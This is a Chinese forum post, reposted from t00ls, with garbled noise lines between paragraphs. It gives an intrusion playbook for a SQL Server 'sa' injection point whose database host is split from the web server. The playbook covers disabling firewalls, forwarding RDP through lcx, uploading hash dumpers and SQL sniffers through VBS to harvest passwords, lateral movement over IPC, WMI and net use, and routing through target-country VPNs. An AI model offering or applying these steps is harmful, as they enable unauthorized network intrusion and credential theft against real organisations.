当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。, R* D; F+ S# V B, m6 z
6 W6 R1 z! m4 j3 t; b; u8 y' M( T3 z
' b/ q# f; M$ h% _, R% ]* Z0 ?0 t+ k5 D0 G8 x; o
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
* i; ]$ l& N( `% e! J9 N& I5 X% t) W7 I5 N0 w _
. F7 w4 H" Q% i8 H3 J/ X, }
一、DB机有公网IP.
/ B0 I9 t9 Q: k4 L. m4 }. ^: G, @" K3 I9 y+ Y) D: X. g
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
# h/ y7 e6 z, J' j$ Q3 m. Y+ j5 H7 ~
) P1 y7 S: \9 ?) N6 T' d
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.' f; ^# p1 V' n
* F% M) a V! E. X, Q- T$ d: H+ h' }' r0 L' ?6 i0 N
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
5 F5 \: S# a# C: b0 a9 @9 ]: ]* M/ z9 W) L$ ^
8 c g \& c' E( K7 L
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
9 }! Z* x3 g6 y, {; q d% k
0 w! k, Q: R) ?, ?; ~& e, G2 Y6 c: a
& g+ L6 u# e1 c1 W% P3 v
二、DB机只有内网IP1 C% c/ G* {- q9 k
& O" Z" f9 G. O) Q) m' f
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. _. q5 F; ~1 l! J( c
5 }# }* F) S( d7 _% d) n9 T2 y/ ?9 y; S4 R, ^
2:停掉防火墙和IP策略再从内往外扫描.
/ m* A6 }0 ?/ I9 j$ \& j5 Z0 ?& V% [! E
, \% `" E( M; d. l5 J3 W3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
: L, W8 `5 K `! \- ?. V# c7 R9 f- x1 E8 k8 N, F3 \6 K
! f: c, n, O8 b' ^# r1 h* O4:学会密码规律分析往往会有惊喜.! t, @7 ]1 b) W; d2 C
2 n' [ R2 Y X" K
, h/ Q- z X7 a# f+ F+ S# \
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
$ A" o `4 j3 i! c, G
3 H/ j- l0 _5 G2 u j! |* _+ C+ u6 |; q+ U6 C
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |